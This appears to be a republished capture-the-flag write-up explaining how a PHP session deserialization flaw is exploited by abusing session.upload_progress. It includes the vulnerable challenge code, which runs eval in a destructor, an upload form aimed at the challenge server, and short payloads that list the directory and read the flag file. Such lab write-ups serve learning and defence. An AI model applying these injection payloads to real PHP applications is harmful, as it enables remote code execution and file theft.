[CTF][University War Epidemic] php-session deserialization problem

Others 2020-10-04 00:14:39 views: null

Article Directory

Pre-knowledge

Session storage mechanism

The content of the session in php is not stored in memory, but is stored as a file. The storage method is determined by the configuration item session.save_handler, and the default is to store it as a file.
The stored file is named after sess_sessionid

  • php : Default usage, format key name|key value (value processed by serialization function)
  • php_serialize: Format the value processed by the serialization function
  • php_binary: ASCII characters corresponding to the length of the key name + key name + value processed by the serialization function

  • Use session.upload_progress for file inclusion and deserialization penetration

Just look at this article written by freebuf and
use session.upload_progress for file inclusion and deserialization infiltration

wp part

After opening the topic, after the code audit, it was found that there were not many exploitable points.
According to ini_set(‘session.serialize_handler’, ‘php’)this sentence, it is speculated that there are related vulnerabilities in the serialization of objects in PHP.

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    
    
    public $mdzz;
    function __construct()
    {
    
    
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
    
    
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    
    
    $m = new OowoO();
}
else
{
    
    
    highlight_string(file_get_contents('index.php'));
}
?>

Then let's go to phpinfo to check it, enabled=on means the upload_progress function is started, which also means that when the browser uploads a file to the server, php will store the detailed information of the file upload (such as upload time, upload progress, etc.) In the session; just POST a field named PHP_SESSION_UPLOAD_PROGRESS to the address, then you can assign the value of filename to the session.
Insert picture description here
Construct an upload form:

<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="777" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

Check again and find disable_functionsthat the function system is disabled, then we can use other methods to view, remember to add the value in front of the value to |
print_r(scandir(dirname(__FILE__)));
Insert picture description here
view the current path through the phpinfo page_SERVER["SCRIPT_FILENAME"]
Insert picture description here

print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));
Insert picture description here

Guess you like

Origin blog.csdn.net/solitudi/article/details/108861664
Recommended
Ranking
vue project automated build tools 1.0, support for multi-page build
JDBC add, update, delete data
SpringCloud combat service in response to the decline tutorial series (Chapter IV)
A segmentation fault (core dumped) error occurs when C+11 compiles and calls the PCL library
Django achieve websocket
Go语言并发之道--笔记1
Three-tier structure and application
Zhejiang data structure after-school exercise practice two 7-2 Reversing Linked List (25 points)
Front-end interview brushing day9 (updated daily high-frequency inspection points for front-end interviews)
The difference between the shell of the single and double quote
Daily
More
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)

Code World

© 2018 codetd.com